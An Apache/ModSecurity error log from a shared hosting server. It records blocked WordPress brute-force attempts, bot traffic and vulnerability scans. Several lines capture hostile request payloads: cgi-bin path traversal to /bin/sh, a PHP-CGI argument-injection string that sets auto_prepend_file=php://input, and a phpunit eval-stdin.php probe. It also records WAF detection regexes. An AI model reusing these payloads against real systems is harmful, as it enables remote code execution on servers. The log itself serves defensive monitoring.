[Tue May 26 18:58:25.095272 2026] [security2:error] [pid 1045635:tid 1045803] [client 159.223.87.191:52608] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWf-RhDcQXYr7SS5sUCPQAAACY"]
[Tue May 26 18:58:25.532949 2026] [security2:error] [pid 1045635:tid 1045787] [client 113.187.237.111:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf-RhDcQXYr7SS5sUCQQAAABY"]
[Tue May 26 18:58:25.537046 2026] [security2:error] [pid 1045635:tid 1045847] [client 103.46.10.14:57480] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWf-BhDcQXYr7SS5sUCLwAAAFI"]
[Tue May 26 18:58:25.878974 2026] [security2:error] [pid 1045635:tid 1045828] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf-RhDcQXYr7SS5sUCTAAAAD8"]
[Tue May 26 18:58:26.339922 2026] [security2:error] [pid 1045635:tid 1045847] [client 103.46.10.14:57480] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWf-BhDcQXYr7SS5sUCLwAAAFI"]
[Tue May 26 18:58:26.455942 2026] [core:crit] [pid 1045635:tid 1045852] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:58:27.641500 2026] [security2:error] [pid 1045635:tid 1045869] [client 74.7.228.14:44396] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "ghanemgh.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWf-xhDcQXYr7SS5sUCfQAAaDw"]
[Tue May 26 18:58:27.930253 2026] [security2:error] [pid 1045635:tid 1045800] [client 196.244.71.27:52061] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWf-hhDcQXYr7SS5sUCbwAAACM"], referer: https://www.cagmedya.com/
[Tue May 26 18:58:28.694560 2026] [security2:error] [pid 1045635:tid 1045765] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf_BhDcQXYr7SS5sUCiwAAAAA"]
[Tue May 26 18:58:29.463707 2026] [security2:error] [pid 1045635:tid 1045689] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWf_RhDcQXYr7SS5sUClwAAcDU"]
[Tue May 26 18:58:29.463920 2026] [security2:error] [pid 1045635:tid 1045877] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWf_RhDcQXYr7SS5sUClwAAcDU"]
[Tue May 26 18:58:30.963206 2026] [security2:error] [pid 1045635:tid 1045810] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf_hhDcQXYr7SS5sUCqAAAAC0"]
[Tue May 26 18:58:32.763067 2026] [security2:error] [pid 1045635:tid 1045818] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgABhDcQXYr7SS5sUCxAAAADU"]
[Tue May 26 18:58:33.062821 2026] [security2:error] [pid 1045635:tid 1045718] [remote 13.42.154.237:53138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.154.42.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgABhDcQXYr7SS5sUC0gAAc1I"]
[Tue May 26 18:58:33.369116 2026] [security2:error] [pid 1045635:tid 1045703] [remote 13.42.154.237:53138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.154.42.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgARhDcQXYr7SS5sUC2QAASUM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:58:34.203234 2026] [security2:error] [pid 1045635:tid 1045708] [remote 74.7.241.58:39634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWgAhhDcQXYr7SS5sUC_AAAYUg"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/mailchimp-for-wp/integrations/ninja-forms
[Tue May 26 18:58:34.845136 2026] [security2:error] [pid 1045635:tid 1045769] [client 103.46.10.14:58350] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWgAhhDcQXYr7SS5sUDCgAAAAQ"]
[Tue May 26 18:58:35.027070 2026] [autoindex:error] [pid 1045635:tid 1045827] [client 43.159.152.4:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.juniorwoodies.com
[Tue May 26 18:58:35.189867 2026] [security2:error] [pid 1045635:tid 1045769] [client 103.46.10.14:58350] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWgAhhDcQXYr7SS5sUDCgAAAAQ"]
[Tue May 26 18:58:35.684635 2026] [security2:error] [pid 1045635:tid 1045887] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgAxhDcQXYr7SS5sUDJAAAAHo"]
[Tue May 26 18:58:36.381042 2026] [security2:error] [pid 1045635:tid 1045863] [client 103.46.10.14:58518] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWgBBhDcQXYr7SS5sUDTAAAAGI"]
[Tue May 26 18:58:36.712710 2026] [security2:error] [pid 1045635:tid 1045863] [client 103.46.10.14:58518] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWgBBhDcQXYr7SS5sUDTAAAAGI"]
[Tue May 26 18:58:37.997725 2026] [security2:error] [pid 1045635:tid 1045791] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgBRhDcQXYr7SS5sUDbQAAABo"]
[Tue May 26 18:58:38.268463 2026] [security2:error] [pid 1045635:tid 1045866] [client 103.46.10.14:58714] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWgBhhDcQXYr7SS5sUDhQAAAGU"]
[Tue May 26 18:58:38.397837 2026] [security2:error] [pid 1045635:tid 1045721] [remote 38.95.35.74:44372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgBhhDcQXYr7SS5sUDgQAAdFU"]
[Tue May 26 18:58:38.538890 2026] [security2:error] [pid 1045635:tid 1045722] [remote 206.189.187.127:46300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.187.189.206.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgBhhDcQXYr7SS5sUDjQAAY1Y"]
[Tue May 26 18:58:38.610917 2026] [security2:error] [pid 1045635:tid 1045866] [client 103.46.10.14:58714] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWgBhhDcQXYr7SS5sUDhQAAAGU"]
[Tue May 26 18:58:38.797124 2026] [security2:error] [pid 1045635:tid 1045725] [remote 206.189.187.127:46300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.187.189.206.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgBhhDcQXYr7SS5sUDkwAAeVk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:58:39.067123 2026] [core:error] [pid 1045635:tid 1045777] [client 161.153.62.49:48862] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:58:39.067150 2026] [core:error] [pid 1045635:tid 1045777] [client 161.153.62.49:48862] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:58:39.932828 2026] [security2:error] [pid 1045635:tid 1045729] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgBxhDcQXYr7SS5sUDrwAAb10"]
[Tue May 26 18:58:39.933066 2026] [security2:error] [pid 1045635:tid 1045876] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgBxhDcQXYr7SS5sUDrwAAb10"]
[Tue May 26 18:58:40.259131 2026] [security2:error] [pid 1045635:tid 1045862] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgBxhDcQXYr7SS5sUDqwAAAGE"]
[Tue May 26 18:58:41.951915 2026] [security2:error] [pid 1045635:tid 1045854] [client 103.46.10.14:59146] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWgCRhDcQXYr7SS5sUD9AAAAFk"]
[Tue May 26 18:58:41.960405 2026] [security2:error] [pid 1045635:tid 1045831] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgCRhDcQXYr7SS5sUD4AAAAEI"]
[Tue May 26 18:58:42.286024 2026] [security2:error] [pid 1045635:tid 1045854] [client 103.46.10.14:59146] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWgCRhDcQXYr7SS5sUD9AAAAFk"]
[Tue May 26 18:58:42.694512 2026] [security2:error] [pid 1045635:tid 1045742] [remote 54.38.147.175:29876] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "premium-homesdxb.com"] [uri "/robots.txt"] [unique_id "ahWgChhDcQXYr7SS5sUEBgAAW2o"]
[Tue May 26 18:58:42.694808 2026] [security2:error] [pid 1045635:tid 1045856] [client 54.38.147.175:29876] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "premium-homesdxb.com"] [uri "/robots.txt"] [unique_id "ahWgChhDcQXYr7SS5sUEBgAAW2o"]
[Tue May 26 18:58:43.356073 2026] [security2:error] [pid 1045635:tid 1045757] [remote 38.95.35.74:44372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgCxhDcQXYr7SS5sUEEAAAT3k"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:58:44.128117 2026] [security2:error] [pid 1045635:tid 1045834] [client 103.46.10.14:59356] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWgDBhDcQXYr7SS5sUEKQAAAEU"]
[Tue May 26 18:58:44.130741 2026] [security2:error] [pid 1045635:tid 1045758] [remote 54.39.6.148:61380] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "premium-homesdxb.com"] [uri "/"] [unique_id "ahWgDBhDcQXYr7SS5sUEKwAAX3o"]
[Tue May 26 18:58:44.130953 2026] [security2:error] [pid 1045635:tid 1045860] [client 54.39.6.148:61380] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "premium-homesdxb.com"] [uri "/"] [unique_id "ahWgDBhDcQXYr7SS5sUEKwAAX3o"]
[Tue May 26 18:58:44.249967 2026] [security2:error] [pid 1045635:tid 1045840] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgCxhDcQXYr7SS5sUEIwAAAEs"]
[Tue May 26 18:58:44.464375 2026] [security2:error] [pid 1045635:tid 1045834] [client 103.46.10.14:59356] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWgDBhDcQXYr7SS5sUEKQAAAEU"]
[Tue May 26 18:58:45.380128 2026] [security2:error] [pid 1045635:tid 1045766] [client 92.222.104.206:48140] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "dimensioncorporativa.com.co"] [uri "/robots.txt"] [unique_id "ahWgDRhDcQXYr7SS5sUETwAAAAE"]
[Tue May 26 18:58:45.380225 2026] [security2:error] [pid 1045635:tid 1045766] [client 92.222.104.206:48140] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dimensioncorporativa.com.co"] [uri "/robots.txt"] [unique_id "ahWgDRhDcQXYr7SS5sUETwAAAAE"]
[Tue May 26 18:58:45.583334 2026] [core:error] [pid 1045635:tid 1045842] [client 192.227.210.218:53680] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Tue May 26 18:58:45.924429 2026] [security2:error] [pid 1045635:tid 1045807] [client 103.46.10.14:59542] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWgDRhDcQXYr7SS5sUEYAAAACo"]
[Tue May 26 18:58:46.192048 2026] [core:error] [pid 1045635:tid 1045880] [client 192.227.210.218:53696] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Tue May 26 18:58:46.261132 2026] [security2:error] [pid 1045635:tid 1045807] [client 103.46.10.14:59542] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahWgDRhDcQXYr7SS5sUEYAAAACo"]
[Tue May 26 18:58:46.725509 2026] [security2:error] [pid 1045635:tid 1045837] [client 51.161.65.170:63370] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "dimensioncorporativa.com.co"] [uri "/"] [unique_id "ahWgDhhDcQXYr7SS5sUEfQAAAEg"]
[Tue May 26 18:58:46.725667 2026] [security2:error] [pid 1045635:tid 1045837] [client 51.161.65.170:63370] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dimensioncorporativa.com.co"] [uri "/"] [unique_id "ahWgDhhDcQXYr7SS5sUEfQAAAEg"]
[Tue May 26 18:58:47.111548 2026] [security2:error] [pid 1045635:tid 1045884] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgDhhDcQXYr7SS5sUEfAAAAHc"]
[Tue May 26 18:58:47.155818 2026] [security2:error] [pid 1045635:tid 1045871] [client 192.227.210.218:53706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "=(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)://" at REQUEST_URI. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "517"] [id "340165"] [rev "291"] [msg "Atomicorp.com WAF Rules: Uniencoded possible Remote File Injection attempt in URI (AE)"] [data "/hello.world?\\xadd allow_url_include=1 \\xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/hello.world"] [unique_id "ahWgDxhDcQXYr7SS5sUEhAAAAGo"]
[Tue May 26 18:58:48.114775 2026] [security2:error] [pid 1045635:tid 1045869] [client 192.227.210.218:53706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "=(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)://" at REQUEST_URI. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "517"] [id "340165"] [rev "291"] [msg "Atomicorp.com WAF Rules: Uniencoded possible Remote File Injection attempt in URI (AE)"] [data "/?\\xadd allow_url_include=1 \\xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/"] [unique_id "ahWgEBhDcQXYr7SS5sUEngAAAGg"]
[Tue May 26 18:58:48.158599 2026] [security2:error] [pid 1045635:tid 1045872] [client 35.204.134.146:24576] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "www.shahvishaal.com"] [uri "/"] [unique_id "ahWgEBhDcQXYr7SS5sUEogAAAGs"]
[Tue May 26 18:58:48.158769 2026] [security2:error] [pid 1045635:tid 1045872] [client 35.204.134.146:24576] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.shahvishaal.com"] [uri "/"] [unique_id "ahWgEBhDcQXYr7SS5sUEogAAAGs"]
[Tue May 26 18:58:48.979880 2026] [security2:error] [pid 1045635:tid 1045776] [client 192.227.210.218:53706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 218.210.227.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "162.222.227.191"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahWgEBhDcQXYr7SS5sUEuQAAAAs"]
[Tue May 26 18:58:49.391009 2026] [security2:error] [pid 1045635:tid 1045871] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgEBhDcQXYr7SS5sUExQAAAGo"]
[Tue May 26 18:58:50.642024 2026] [security2:error] [pid 1045635:tid 1045735] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgEhhDcQXYr7SS5sUFPgAANmM"]
[Tue May 26 18:58:50.642183 2026] [security2:error] [pid 1045635:tid 1045819] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgEhhDcQXYr7SS5sUFPgAANmM"]
[Tue May 26 18:58:51.776745 2026] [security2:error] [pid 1045635:tid 1045818] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgExhDcQXYr7SS5sUFUQAAADU"]
